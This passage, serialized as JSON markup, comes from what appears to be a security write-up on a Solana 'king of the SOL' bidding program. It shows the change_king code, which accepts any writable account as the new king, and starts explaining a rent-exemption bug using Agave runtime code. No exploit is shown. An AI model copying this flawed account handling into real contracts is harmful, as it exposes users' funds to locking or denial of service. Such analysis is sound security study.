king.\n",{"type":24,"tag":301,"props":78204,"children":78205},{"class":303,"line":504},[78206,78210,78214],{"type":24,"tag":301,"props":78207,"children":78208},{"style":359},[78209],{"type":30,"value":29896},{"type":24,"tag":301,"props":78211,"children":78212},{"style":348},[78213],{"type":30,"value":10550},{"type":24,"tag":301,"props":78215,"children":78216},{"style":359},[78217],{"type":30,"value":27029},{"type":24,"tag":301,"props":78219,"children":78220},{"class":303,"line":512},[78221,78225,78230,78234,78238,78242,78246],{"type":24,"tag":301,"props":78222,"children":78223},{"style":348},[78224],{"type":30,"value":27612},{"type":24,"tag":301,"props":78226,"children":78227},{"style":369},[78228],{"type":30,"value":78229}," new_king",{"type":24,"tag":301,"props":78231,"children":78232},{"style":385},[78233],{"type":30,"value":1679},{"type":24,"tag":301,"props":78235,"children":78236},{"style":10246},[78237],{"type":30,"value":32154},{"type":24,"tag":301,"props":78239,"children":78240},{"style":359},[78241],{"type":30,"value":29690},{"type":24,"tag":301,"props":78243,"children":78244},{"style":10246},[78245],{"type":30,"value":29695},{"type":24,"tag":301,"props":78247,"children":78248},{"style":359},[78249],{"type":30,"value":12957},{"type":24,"tag":301,"props":78251,"children":78252},{"class":303,"line":592},[78253],{"type":24,"tag":301,"props":78254,"children":78255},{"emptyLinePlaceholder":16},[78256],{"type":30,"value":341},{"type":24,"tag":301,"props":78258,"children":78259},{"class":303,"line":619},[78260,78264,78268],{"type":24,"tag":301,"props":78261,"children":78262},{"style":359},[78263],{"type":30,"value":29896},{"type":24,"tag":301,"props":78265,"children":78266},{"style":348},[78267],{"type":30,"value":10550},{"type":24,"tag":301,"props":78269,"children":78270},{"style":359},[78271],{"type":30,"value":27029},{"type":24,"tag":301,"props":78273,"children":78274},{"class":303,"line":635},[78275,78279,78283,78287,78291,78295,78299],{"type":24,"tag":301,"props":78276,"children":78277},{"style":348},[78278],{"type":30,"value":27612},{"type":24,"tag":301,"props":78280,"children":78281},{"style":369},[78282],{"type":30,"value":48977},{"type":24,"tag":301,"props":78284,"children":78285},{"style":385},[78286],{"type":30,"value":1679},{"type":24,"tag":301,"props":78288,"children":78289},{"style":10246},[78290],{"type":30,"value":29925},{"type":24,"tag":301,"props":78292,"children":78293},{"style":359},[78294],{"type":30,"value":29690},{"type":24,"tag":301,"props":78296,"children":78297},{"style":10246},[78298],{"type":30,"value":29695},{"type":24,"tag":301,"props":78300,"children":78301},{"style":359},[78302],{"type":30,"value":12957},{"type":24,"tag":301,"props":78304,"children":78305},{"class":303,"line":643},[78306],{"type":24,"tag":301,"props":78307,"children":78308},{"style":359},[78309],{"type":30,"value":698},{"type":24,"tag":301,"props":78311,"children":78312},{"class":303,"line":652},[78313],{"type":24,"tag":301,"props":78314,"children":78315},{"emptyLinePlaceholder":16},[78316],{"type":30,"value":341},{"type":24,"tag":301,"props":78318,"children":78319},{"class":303,"line":666},[78320],{"type":24,"tag":301,"props":78321,"children":78322},{"style":359},[78323],{"type":30,"value":78324},"#[program]\n",{"type":24,"tag":301,"props":78326,"children":78327},{"class":303,"line":674},[78328,78332,78337],{"type":24,"tag":301,"props":78329,"children":78330},{"style":348},[78331],{"type":30,"value":20484},{"type":24,"tag":301,"props":78333,"children":78334},{"style":348},[78335],{"type":30,"value":78336}," mod",{"type":24,"tag":301,"props":78338,"children":78339},{"style":359},[78340],{"type":30,"value":78341}," king_of_the_sol {\n",{"type":24,"tag":301,"props":78343,"children":78344},{"class":303,"line":692},[78345,78349,78353,78358,78362,78366,78370,78374,78378,78383,78387,78392,78396,78400,78404,78408,78412],{"type":24,"tag":301,"props":78346,"children":78347},{"style":348},[78348],{"type":30,"value":27612},{"type":24,"tag":301,"props":78350,"children":78351},{"style":348},[78352],{"type":30,"value":20489},{"type":24,"tag":301,"props":78354,"children":78355},{"style":314},[78356],{"type":30,"value":78357}," change_king",{"type":24,"tag":301,"props":78359,"children":78360},{"style":359},[78361],{"type":30,"value":362},{"type":24,"tag":301,"props":78363,"children":78364},{"style":369},[78365],{"type":30,"value":27051},{"type":24,"tag":301,"props":78367,"children":78368},{"style":385},[78369],{"type":30,"value":1679},{"type":24,"tag":301,"props":78371,"children":78372},{"style":10246},[78373],{"type":30,"value":27060},{"type":24,"tag":301,"props":78375,"children":78376},{"style":359},[78377],{"type":30,"value":1849},{"type":24,"tag":301,"props":78379,"children":78380},{"style":10246},[78381],{"type":30,"value":78382},"ChangeKing",{"type":24,"tag":301,"props":78384,"children":78385},{"style":359},[78386],{"type":30,"value":13449},{"type":24,"tag":301,"props":78388,"children":78389},{"style":369},[78390],{"type":30,"value":78391},"bid_amount",{"type":24,"tag":301,"props":78393,"children":78394},{"style":385},[78395],{"type":30,"value":1679},{"type":24,"tag":301,"props":78397,"children":78398},{"style":10246},[78399],{"type":30,"value":12680},{"type":24,"tag":301,"props":78401,"children":78402},{"style":359},[78403],{"type":30,"value":911},{"type":24,"tag":301,"props":78405,"children":78406},{"style":385},[78407],{"type":30,"value":882},{"type":24,"tag":301,"props":78409,"children":78410},{"style":10246},[78411],{"type":30,"value":20555},{"type":24,"tag":301,"props":78413,"children":78414},{"style":359},[78415],{"type":30,"value":27102},{"type":24,"tag":301,"props":78417,"children":78418},{"class":303,"line":3631},[78419],{"type":24,"tag":301,"props":78420,"children":78421},{"style":1062},[78422],{"type":30,"value":78423}," // Check that bid_amount is at least 2x last_bid_amount\n",{"type":24,"tag":301,"props":78425,"children":78426},{"class":303,"line":3639},[78427,78431,78435,78439,78443,78447,78451,78455,78459,78464,78468,78473,78477,78481],{"type":24,"tag":301,"props":78428,"children":78429},{"style":314},[78430],{"type":30,"value":71159},{"type":24,"tag":301,"props":78432,"children":78433},{"style":359},[78434],{"type":30,"value":362},{"type":24,"tag":301,"props":78436,"children":78437},{"style":369},[78438],{"type":30,"value":78391},{"type":24,"tag":301,"props":78440,"children":78441},{"style":385},[78442],{"type":30,"value":892},{"type":24,"tag":301,"props":78444,"children":78445},{"style":369},[78446],{"type":30,"value":32599},{"type":24,"tag":301,"props":78448,"children":78449},{"style":385},[78450],{"type":30,"value":206},{"type":24,"tag":301,"props":78452,"children":78453},{"style":359},[78454],{"type":30,"value":21467},{"type":24,"tag":301,"props":78456,"children":78457},{"style":385},[78458],{"type":30,"value":206},{"type":24,"tag":301,"props":78460,"children":78461},{"style":359},[78462],{"type":30,"value":78463},"throne",{"type":24,"tag":301,"props":78465,"children":78466},{"style":385},[78467],{"type":30,"value":206},{"type":24,"tag":301,"props":78469,"children":78470},{"style":359},[78471],{"type":30,"value":78472},"last_bid_amount ",{"type":24,"tag":301,"props":78474,"children":78475},{"style":385},[78476],{"type":30,"value":772},{"type":24,"tag":301,"props":78478,"children":78479},{"style":466},[78480],{"type":30,"value":469},{"type":24,"tag":301,"props":78482,"children":78483},{"style":359},[78484],{"type":30,"value":589},{"type":24,"tag":301,"props":78486,"children":78487},{"class":303,"line":3647},[78488,78493],{"type":24,"tag":301,"props":78489,"children":78490},{"style":314},[78491],{"type":30,"value":78492}," transfer_from_signer",{"type":24,"tag":301,"props":78494,"children":78495},{"style":359},[78496],{"type":30,"value":1707},{"type":24,"tag":301,"props":78498,"children":78499},{"class":303,"line":3685},[78500,78504,78508,78512,78516,78520],{"type":24,"tag":301,"props":78501,"children":78502},{"style":385},[78503],{"type":30,"value":14500},{"type":24,"tag":301,"props":78505,"children":78506},{"style":369},[78507],{"type":30,"value":27051},{"type":24,"tag":301,"props":78509,"children":78510},{"style":385},[78511],{"type":30,"value":206},{"type":24,"tag":301,"props":78513,"children":78514},{"style":359},[78515],{"type":30,"value":21467},{"type":24,"tag":301,"props":78517,"children":78518},{"style":385},[78519],{"type":30,"value":206},{"type":24,"tag":301,"props":78521,"children":78522},{"style":359},[78523],{"type":30,"value":78524},"payer,\n",{"type":24,"tag":301,"props":78526,"children":78527},{"class":303,"line":3713},[78528,78532,78536,78540,78544,78548,78552,78556,78561],{"type":24,"tag":301,"props":78529,"children":78530},{"style":385},[78531],{"type":30,"value":14500},{"type":24,"tag":301,"props":78533,"children":78534},{"style":369},[78535],{"type":30,"value":27051},{"type":24,"tag":301,"props":78537,"children":78538},{"style":385},[78539],{"type":30,"value":206},{"type":24,"tag":301,"props":78541,"children":78542},{"style":359},[78543],{"type":30,"value":21467},{"type":24,"tag":301,"props":78545,"children":78546},{"style":385},[78547],{"type":30,"value":206},{"type":24,"tag":301,"props":78549,"children":78550},{"style":359},[78551],{"type":30,"value":78463},{"type":24,"tag":301,"props":78553,"children":78554},{"style":385},[78555],{"type":30,"value":206},{"type":24,"tag":301,"props":78557,"children":78558},{"style":314},[78559],{"type":30,"value":78560},"to_account_info",{"type":24,"tag":301,"props":78562,"children":78563},{"style":359},[78564],{"type":30,"value":10318},{"type":24,"tag":301,"props":78566,"children":78567},{"class":303,"line":3721},[78568,78573],{"type":24,"tag":301,"props":78569,"children":78570},{"style":369},[78571],{"type":30,"value":78572}," bid_amount",{"type":24,"tag":301,"props":78574,"children":78575},{"style":359},[78576],{"type":30,"value":1729},{"type":24,"tag":301,"props":78578,"children":78579},{"class":303,"line":3751},[78580,78585,78589],{"type":24,"tag":301,"props":78581,"children":78582},{"style":359},[78583],{"type":30,"value":78584}," )",{"type":24,"tag":301,"props":78586,"children":78587},{"style":385},[78588],{"type":30,"value":2003},{"type":24,"tag":301,"props":78590,"children":78591},{"style":359},[78592],{"type":30,"value":492},{"type":24,"tag":301,"props":78594,"children":78595},{"class":303,"line":3782},[78596],{"type":24,"tag":301,"props":78597,"children":78598},{"emptyLinePlaceholder":16},[78599],{"type":30,"value":341},{"type":24,"tag":301,"props":78601,"children":78602},{"class":303,"line":3791},[78603],{"type":24,"tag":301,"props":78604,"children":78605},{"style":1062},[78606],{"type":30,"value":78607}," // Reimburse 95% of the last bid to the old king\n",{"type":24,"tag":301,"props":78609,"children":78610},{"class":303,"line":3819},[78611,78615,78620,78624,78628,78632,78636,78640,78644,78648,78652,78656,78660,78665,78669,78673,78678],{"type":24,"tag":301,"props":78612,"children":78613},{"style":348},[78614],{"type":30,"value":9900},{"type":24,"tag":301,"props":78616,"children":78617},{"style":369},[78618],{"type":30,"value":78619}," to_reimburse",{"type":24,"tag":301,"props":78621,"children":78622},{"style":385},[78623],{"type":30,"value":2537},{"type":24,"tag":301,"props":78625,"children":78626},{"style":359},[78627],{"type":30,"value":873},{"type":24,"tag":301,"props":78629,"children":78630},{"style":369},[78631],{"type":30,"value":27051},{"type":24,"tag":301,"props":78633,"children":78634},{"style":385},[78635],{"type":30,"value":206},{"type":24,"tag":301,"props":78637,"children":78638},{"style":359},[78639],{"type":30,"value":21467},{"type":24,"tag":301,"props":78641,"children":78642},{"style":385},[78643],{"type":30,"value":206},{"type":24,"tag":301,"props":78645,"children":78646},{"style":359},[78647],{"type":30,"value":78463},{"type":24,"tag":301,"props":78649,"children":78650},{"style":385},[78651],{"type":30,"value":206},{"type":24,"tag":301,"props":78653,"children":78654},{"style":359},[78655],{"type":30,"value":78472},{"type":24,"tag":301,"props":78657,"children":78658},{"style":385},[78659],{"type":30,"value":772},{"type":24,"tag":301,"props":78661,"children":78662},{"style":466},[78663],{"type":30,"value":78664}," 9500",{"type":24,"tag":301,"props":78666,"children":78667},{"style":359},[78668],{"type":30,"value":911},{"type":24,"tag":301,"props":78670,"children":78671},{"style":385},[78672],{"type":30,"value":1036},{"type":24,"tag":301,"props":78674,"children":78675},{"style":466},[78676],{"type":30,"value":78677}," 10000",{"type":24,"tag":301,"props":78679,"children":78680},{"style":359},[78681],{"type":30,"value":492},{"type":24,"tag":301,"props":78683,"children":78684},{"class":303,"line":4397},[78685,78690],{"type":24,"tag":301,"props":78686,"children":78687},{"style":314},[78688],{"type":30,"value":78689}," transfer_from_pda",{"type":24,"tag":301,"props":78691,"children":78692},{"style":359},[78693],{"type":30,"value":1707},{"type":24,"tag":301,"props":78695,"children":78696},{"class":303,"line":4405},[78697,78701,78705,78709,78713,78717,78721,78725,78729],{"type":24,"tag":301,"props":78698,"children":78699},{"style":385},[78700],{"type":30,"value":14500},{"type":24,"tag":301,"props":78702,"children":78703},{"style":369},[78704],{"type":30,"value":27051},{"type":24,"tag":301,"props":78706,"children":78707},{"style":385},[78708],{"type":30,"value":206},{"type":24,"tag":301,"props":78710,"children":78711},{"style":359},[78712],{"type":30,"value":21467},{"type":24,"tag":301,"props":78714,"children":78715},{"style":385},[78716],{"type":30,"value":206},{"type":24,"tag":301,"props":78718,"children":78719},{"style":359},[78720],{"type":30,"value":78463},{"type":24,"tag":301,"props":78722,"children":78723},{"style":385},[78724],{"type":30,"value":206},{"type":24,"tag":301,"props":78726,"children":78727},{"style":314},[78728],{"type":30,"value":78560},{"type":24,"tag":301,"props":78730,"children":78731},{"style":359},[78732],{"type":30,"value":10318},{"type":24,"tag":301,"props":78734,"children":78735},{"class":303,"line":4422},[78736,78740,78744,78748,78752,78756],{"type":24,"tag":301,"props":78737,"children":78738},{"style":385},[78739],{"type":30,"value":14500},{"type":24,"tag":301,"props":78741,"children":78742},{"style":369},[78743],{"type":30,"value":27051},{"type":24,"tag":301,"props":78745,"children":78746},{"style":385},[78747],{"type":30,"value":206},{"type":24,"tag":301,"props":78749,"children":78750},{"style":359},[78751],{"type":30,"value":21467},{"type":24,"tag":301,"props":78753,"children":78754},{"style":385},[78755],{"type":30,"value":206},{"type":24,"tag":301,"props":78757,"children":78758},{"style":359},[78759],{"type":30,"value":78760},"old_king,\n",{"type":24,"tag":301,"props":78762,"children":78763},{"class":303,"line":4438},[78764,78769],{"type":24,"tag":301,"props":78765,"children":78766},{"style":369},[78767],{"type":30,"value":78768}," to_reimburse",{"type":24,"tag":301,"props":78770,"children":78771},{"style":359},[78772],{"type":30,"value":1729},{"type":24,"tag":301,"props":78774,"children":78775},{"class":303,"line":4446},[78776,78780,78784],{"type":24,"tag":301,"props":78777,"children":78778},{"style":359},[78779],{"type":30,"value":78584},{"type":24,"tag":301,"props":78781,"children":78782},{"style":385},[78783],{"type":30,"value":2003},{"type":24,"tag":301,"props":78785,"children":78786},{"style":359},[78787],{"type":30,"value":492},{"type":24,"tag":301,"props":78789,"children":78790},{"class":303,"line":4506},[78791],{"type":24,"tag":301,"props":78792,"children":78793},{"emptyLinePlaceholder":16},[78794],{"type":30,"value":341},{"type":24,"tag":301,"props":78796,"children":78797},{"class":303,"line":4566},[78798],{"type":24,"tag":301,"props":78799,"children":78800},{"style":1062},[78801],{"type":30,"value":78802}," // Set new king\n",{"type":24,"tag":301,"props":78804,"children":78805},{"class":303,"line":4574},[78806,78810,78814,78818,78822,78826,78830,78835,78839,78843,78847,78851,78855,78860,78864,78869],{"type":24,"tag":301,"props":78807,"children":78808},{"style":369},[78809],{"type":30,"value":32942},{"type":24,"tag":301,"props":78811,"children":78812},{"style":385},[78813],{"type":30,"value":206},{"type":24,"tag":301,"props":78815,"children":78816},{"style":359},[78817],{"type":30,"value":21467},{"type":24,"tag":301,"props":78819,"children":78820},{"style":385},[78821],{"type":30,"value":206},{"type":24,"tag":301,"props":78823,"children":78824},{"style":359},[78825],{"type":30,"value":78463},{"type":24,"tag":301,"props":78827,"children":78828},{"style":385},[78829],{"type":30,"value":206},{"type":24,"tag":301,"props":78831,"children":78832},{"style":359},[78833],{"type":30,"value":78834},"king ",{"type":24,"tag":301,"props":78836,"children":78837},{"style":385},[78838],{"type":30,"value":523},{"type":24,"tag":301,"props":78840,"children":78841},{"style":369},[78842],{"type":30,"value":32599},{"type":24,"tag":301,"props":78844,"children":78845},{"style":385},[78846],{"type":30,"value":206},{"type":24,"tag":301,"props":78848,"children":78849},{"style":359},[78850],{"type":30,"value":21467},{"type":24,"tag":301,"props":78852,"children":78853},{"style":385},[78854],{"type":30,"value":206},{"type":24,"tag":301,"props":78856,"children":78857},{"style":359},[78858],{"type":30,"value":78859},"new_king",{"type":24,"tag":301,"props":78861,"children":78862},{"style":385},[78863],{"type":30,"value":206},{"type":24,"tag":301,"props":78865,"children":78866},{"style":314},[78867],{"type":30,"value":78868},"key",{"type":24,"tag":301,"props":78870,"children":78871},{"style":359},[78872],{"type":30,"value":4859},{"type":24,"tag":301,"props":78874,"children":78875},{"class":303,"line":4590},[78876,78880,78884,78888,78892,78896,78900,78904,78908,78913],{"type":24,"tag":301,"props":78877,"children":78878},{"style":369},[78879],{"type":30,"value":32942},{"type":24,"tag":301,"props":78881,"children":78882},{"style":385},[78883],{"type":30,"value":206},{"type":24,"tag":301,"props":78885,"children":78886},{"style":359},[78887],{"type":30,"value":21467},{"type":24,"tag":301,"props":78889,"children":78890},{"style":385},[78891],{"type":30,"value":206},{"type":24,"tag":301,"props":78893,"children":78894},{"style":359},[78895],{"type":30,"value":78463},{"type":24,"tag":301,"props":78897,"children":78898},{"style":385},[78899],{"type":30,"value":206},{"type":24,"tag":301,"props":78901,"children":78902},{"style":359},[78903],{"type":30,"value":78472},{"type":24,"tag":301,"props":78905,"children":78906},{"style":385},[78907],{"type":30,"value":523},{"type":24,"tag":301,"props":78909,"children":78910},{"style":369},[78911],{"type":30,"value":78912}," bid_amount",{"type":24,"tag":301,"props":78914,"children":78915},{"style":359},[78916],{"type":30,"value":492},{"type":24,"tag":301,"props":78918,"children":78919},{"class":303,"line":4599},[78920,78924,78928,78932,78936,78940,78944,78949,78953,78958,78962,78966,78970,78974,78979,78983,78987],{"type":24,"tag":301,"props":78921,"children":78922},{"style":369},[78923],{"type":30,"value":32942},{"type":24,"tag":301,"props":78925,"children":78926},{"style":385},[78927],{"type":30,"value":206},{"type":24,"tag":301,"props":78929,"children":78930},{"style":359},[78931],{"type":30,"value":21467},{"type":24,"tag":301,"props":78933,"children":78934},{"style":385},[78935],{"type":30,"value":206},{"type":24,"tag":301,"props":78937,"children":78938},{"style":359},[78939],{"type":30,"value":78463},{"type":24,"tag":301,"props":78941,"children":78942},{"style":385},[78943],{"type":30,"value":206},{"type":24,"tag":301,"props":78945,"children":78946},{"style":359},[78947],{"type":30,"value":78948},"last_time ",{"type":24,"tag":301,"props":78950,"children":78951},{"style":385},[78952],{"type":30,"value":523},{"type":24,"tag":301,"props":78954,"children":78955},{"style":10246},[78956],{"type":30,"value":78957}," Clock",{"type":24,"tag":301,"props":78959,"children":78960},{"style":385},[78961],{"type":30,"value":10308},{"type":24,"tag":301,"props":78963,"children":78964},{"style":314},[78965],{"type":30,"value":23138},{"type":24,"tag":301,"props":78967,"children":78968},{"style":359},[78969],{"type":30,"value":20672},{"type":24,"tag":301,"props":78971,"children":78972},{"style":385},[78973],{"type":30,"value":9966},{"type":24,"tag":301,"props":78975,"children":78976},{"style":359},[78977],{"type":30,"value":78978},"unix_timestamp ",{"type":24,"tag":301,"props":78980,"children":78981},{"style":348},[78982],{"type":30,"value":15654},{"type":24,"tag":301,"props":78984,"children":78985},{"style":10246},[78986],{"type":30,"value":12680},{"type":24,"tag":301,"props":78988,"children":78989},{"style":359},[78990],{"type":30,"value":492},{"type":24,"tag":301,"props":78992,"children":78993},{"class":303,"line":4629},[78994],{"type":24,"tag":301,"props":78995,"children":78996},{"emptyLinePlaceholder":16},[78997],{"type":30,"value":341},{"type":24,"tag":301,"props":78999,"children":79000},{"class":303,"line":4659},[79001,79005],{"type":24,"tag":301,"props":79002,"children":79003},{"style":10246},[79004],{"type":30,"value":21603},{"type":24,"tag":301,"props":79006,"children":79007},{"style":359},[79008],{"type":30,"value":21130},{"type":24,"tag":301,"props":79010,"children":79011},{"class":303,"line":4668},[79012],{"type":24,"tag":301,"props":79013,"children":79014},{"style":359},[79015],{"type":30,"value":501},{"type":24,"tag":301,"props":79017,"children":79018},{"class":303,"line":4677},[79019],{"type":24,"tag":301,"props":79020,"children":79021},{"style":359},[79022],{"type":30,"value":698},{"type":24,"tag":32,"props":79024,"children":79025},{},[79026],{"type":30,"value":79027},"Note this comment:",{"type":24,"tag":9770,"props":79029,"children":79030},{},[79031],{"type":24,"tag":32,"props":79032,"children":79033},{},[79034],{"type":30,"value":79035},"any writable account is allowed as a new king.",{"type":24,"tag":32,"props":79037,"children":79038},{},[79039],{"type":30,"value":79040},"...Is our assumption correct?",{"type":24,"tag":43,"props":79042,"children":79044},{"id":79043},"the-bugs-lurking-beneath",[79045],{"type":30,"value":79046},"The Bugs Lurking Beneath",{"type":24,"tag":80,"props":79048,"children":79050},{"id":79049},"bug-1-the-rent-exemption-trap",[79051],{"type":30,"value":79052},"Bug 1: The Rent-Exemption Trap",{"type":24,"tag":32,"props":79054,"children":79055},{},[79056,79058,79063],{"type":30,"value":79057},"On Solana, all accounts must maintain a ",{"type":24,"tag":60,"props":79059,"children":79060},{},[79061],{"type":30,"value":79062},"minimum balance",{"type":30,"value":79064}," of lamports to remain rent-exempt. Specifically, an account can be in one of two states:",{"type":24,"tag":2655,"props":79066,"children":79067},{},[79068,79083],{"type":24,"tag":2659,"props":79069,"children":79070},{},[79071,79076,79077],{"type":24,"tag":60,"props":79072,"children":79073},{},[79074],{"type":30,"value":79075},"Uninitialized",{"type":30,"value":5615},{"type":24,"tag":145,"props":79078,"children":79080},{"className":79079},[],[79081],{"type":30,"value":79082},"lamports = 0",{"type":24,"tag":2659,"props":79084,"children":79085},{},[79086,79091,79092],{"type":24,"tag":60,"props":79087,"children":79088},{},[79089],{"type":30,"value":79090},"Initialized",{"type":30,"value":5615},{"type":24,"tag":145,"props":79093,"children":79095},{"className":79094},[],[79096],{"type":30,"value":79097},"lamports >= rent-exempt threshold",{"type":24,"tag":32,"props":79099,"children":79100},{},[79101,79103,79108],{"type":30,"value":79102},"This rent model exists to prevent low-cost DoS attacks on validators. The key idea is that even an account with no data (i.e., zero-length data buffer) still consumes on-chain resources; specifically, ",{"type":24,"tag":60,"props":79104,"children":79105},{},[79106],{"type":30,"value":79107},"account metadata",{"type":30,"value":79109}," like its public key, owner, or lamport balance. That metadata must be stored persistently by validators, and that storage isn't free.",{"type":24,"tag":32,"props":79111,"children":79112},{},[79113,79115,79121],{"type":30,"value":79114},"So “persistent state” on Solana doesn’t just mean your program's data — it includes the base account structure itself. Even accounts with ",{"type":24,"tag":145,"props":79116,"children":79118},{"className":79117},[],[79119],{"type":30,"value":79120},"data.len() == 0",{"type":30,"value":79122}," must meet a minimum rent threshold to remain alive and avoid garbage collection by the runtime.",{"type":24,"tag":32,"props":79124,"children":79125},{},[79126,79128,79134],{"type":30,"value":79127},"This is enforced at the runtime level, and the relevant logic can be found ",{"type":24,"tag":188,"props":79129,"children":79132},{"href":79130,"rel":79131},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/svm-rent-collector/src/svm_rent_collector.rs#L117-L136",[192],[79133],{"type":30,"value":5193},{"type":30,"value":206},{"type":24,"tag":291,"props":79136,"children":79138},{"className":9818,"code":79137,"language":9817,"meta":7,"style":7}," fn transition_allowed(&self, pre_rent_state: &RentState, post_rent_state: &RentState) -> bool {\n match post_rent_state {\n RentState::Uninitialized | RentState::RentExempt => true,\n RentState::RentPaying {\n data_size: post_data_size,\n lamports: post_lamports,\n } => {\n match pre_rent_state {\n RentState::Uninitialized | RentState::RentExempt => false,\n RentState::RentPaying {\n data_size: pre_data_size,\n lamports: pre_lamports,\n } => {\n // Cannot remain RentPaying if resized or credited.\n post_data_size == pre_data_size && post_lamports \u003C= pre_lamports\n }\n }\n }\n }\n }\n",[79139],{"type":24,"tag":145,"props":79140,"children":79141},{"__ignoreMap":7},[79142,79226,79243,79289,79309,79330,79351,79366,79383,79427,79446,79467,79488,79504,79512,79545,79552,79559,79566,79573],{"type":24,"tag":301,"props":79143,"children":79144},{"class":303,"line":304},[79145,79150,79155,79159,79163,79167,79171,79176,79180,79184,79189,79193,79198,79202,79206,79210,79214,79218,79222],{"type":24,"tag":301,"props":79146,"children":79147},{"style":348},[79148],{"type":30,"value":79149}," fn",{"type":24,"tag":301,"props":79151,"children":79152},{"style":314},[79153],{"type":30,"value":79154}," transition_allowed",{"type":24,"tag":301,"props":79156,"children":79157},{"style":359},[79158],{"type":30,"value":362},{"type":24,"tag":301,"props":79160,"children":79161},{"style":385},[79162],{"type":30,"value":556},{"type":24,"tag":301,"props":79164,"children":79165},{"style":348},[79166],{"type":30,"value":20507},{"type":24,"tag":301,"props":79168,"children":79169},{"style":359},[79170],{"type":30,"value":377},{"type":24,"tag":301,"props":79172,"children":79173},{"style":369},[79174],{"type":30,"value":79175},"pre_rent_state",{"type":24,"tag":301,"props":79177,"children":79178},{"style":385},[79179],{"type":30,"value":1679},{"type":24,"tag":301,"props":79181,"children":79182},{"style":385},[79183],{"type":30,"value":991},{"type":24,"tag":301,"props":79185,"children":79186},{"style":10246},[79187],{"type":30,"value":79188},"RentState",{"type":24,"tag":301,"props":79190,"children":79191},{"style":359},[79192],{"type":30,"value":377},{"type":24,"tag":301,"props":79194,"children":79195},{"style":369},[79196],{"type":30,"value":79197},"post_rent_state",{"type":24,"tag":301,"props":79199,"children":79200},{"style":385},[79201],{"type":30,"value":1679},{"type":24,"tag":301,"props":79203,"children":79204},{"style":385},[79205],{"type":30,"value":991},{"type":24,"tag":301,"props":79207,"children":79208},{"style":10246},[79209],{"type":30,"value":79188},{"type":24,"tag":301,"props":79211,"children":79212},{"style":359},[79213],{"type":30,"value":911},{"type":24,"tag":301,"props":79215,"children":79216},{"style":385},[79217],{"type":30,"value":882},{"type":24,"tag":301,"props":79219,"children":79220},{"style":10246},[79221],{"type":30,"value":18848},{"type":24,"tag":301,"props":79223,"children":79224},{"style":359},[79225],{"type":30,"value":3035},{"type":24,"tag":301,"props":79227,"children":79228},{"class":303,"line":320},[79229,79234,79239],{"type":24,"tag":301,"props":79230,"children":79231},{"style":308},[79232],{"type":30,"value":79233}," match",{"type":24,"tag":301,"props":79235,"children":79236},{"style":369},[79237],{"type":30,"value":79238}," post_rent_state",{"type":24,"tag":301,"props":79240,"children":79241},{"style":359},[79242],{"type":30,"value":3035},{"type":24,"tag":301,"props":79244,"children":79245},{"class":303,"line":335},[79246,79251,79255,79259,79263,79268,79272,79277,79281,79285],{"type":24,"tag":301,"props":79247,"children":79248},{"style":10246},[79249],{"type":30,"value":79250}," RentState",{"type":24,"tag":301,"props":79252,"children":79253},{"style":385},[79254],{"type":30,"value":10308},{"type":24,"tag":301,"props":79256,"children":79257},{"style":10246},[79258],{"type":30,"value":79075},{"type":24,"tag":301,"props":79260,"children":79261},{"style":385},[79262],{"type":30,"value":11095},{"type":24,"tag":301,"props":79264,"children":79265},{"style":10246},[79266],{"type":30,"value":79267}," RentState",{"type":24,"tag":301,"props":79269,"children":79270},{"style":385},[79271],{"type":30,"value":10308},{"type":24,"tag":301,"props":79273,"children":79274},{"style":10246},[79275],{"type":30,"value":79276},"RentExempt",{"type":24,"tag":301,"props":79278,"children":79279},{"style":385},[79280],{"type":30,"value":34508},{"type":24,"tag":301,"props":79282,"children":79283},{"style":348},[79284],{"type":30,"value":3440},{"type":24,"tag":301,"props":79286,"children":79287},{"style":359},[79288],{"type":30,"value":1729},{"type":24,"tag":301,"props":79290,"children":79291},{"class":303,"line":344},[79292,79296,79300,79305],{"type":24,"tag":301,"props":79293,"children":79294},{"style":10246},[79295],{"type":30,"value":79250},{"type":24,"tag":301,"props":79297,"children":79298},{"style":385},[79299],{"type":30,"value":10308},{"type":24,"tag":301,"props":79301,"children":79302},{"style":10246},[79303],{"type":30,"value":79304},"RentPaying",{"type":24,"tag":301,"props":79306,"children":79307},{"style":359},[79308],{"type":30,"value":3035},{"type":24,"tag":301,"props":79310,"children":79311},{"class":303,"line":401},[79312,79317,79321,79326],{"type":24,"tag":301,"props":79313,"children":79314},{"style":369},[79315],{"type":30,"value":79316}," data_size",{"type":24,"tag":301,"props":79318,"children":79319},{"style":385},[79320],{"type":30,"value":1679},{"type":24,"tag":301,"props":79322,"children":79323},{"style":369},[79324],{"type":30,"value":79325}," post_data_size",{"type":24,"tag":301,"props":79327,"children":79328},{"style":359},[79329],{"type":30,"value":1729},{"type":24,"tag":301,"props":79331,"children":79332},{"class":303,"line":415},[79333,79338,79342,79347],{"type":24,"tag":301,"props":79334,"children":79335},{"style":369},[79336],{"type":30,"value":79337}," lamports",{"type":24,"tag":301,"props":79339,"children":79340},{"style":385},[79341],{"type":30,"value":1679},{"type":24,"tag":301,"props":79343,"children":79344},{"style":369},[79345],{"type":30,"value":79346}," post_lamports",{"type":24,"tag":301,"props":79348,"children":79349},{"style":359},[79350],{"type":30,"value":1729},{"type":24,"tag":301,"props":79352,"children":79353},{"class":303,"line":439},[79354,79358,79362],{"type":24,"tag":301,"props":79355,"children":79356},{"style":359},[79357],{"type":30,"value":77307},{"type":24,"tag":301,"props":79359,"children":79360},{"style":385},[79361],{"type":30,"value":4841},{"type":24,"tag":301,"props":79363,"children":79364},{"style":359},[79365],{"type":30,"value":3035},{"type":24,"tag":301,"props":79367,"children":79368},{"class":303,"line":447},[79369,79374,79379],{"type":24,"tag":301,"props":79370,"children":79371},{"style":308},[79372],{"type":30,"value":79373}," match",{"type":24,"tag":301,"props":79375,"children":79376},{"style":369},[79377],{"type":30,"value":79378}," pre_rent_state",{"type":24,"tag":301,"props":79380,"children":79381},{"style":359},[79382],{"type":30,"value":3035},{"type":24,"tag":301,"props":79384,"children":79385},{"class":303,"line":476},[79386,79391,79395,79399,79403,79407,79411,79415,79419,79423],{"type":24,"tag":301,"props":79387,"children":79388},{"style":10246},[79389],{"type":30,"value":79390}," 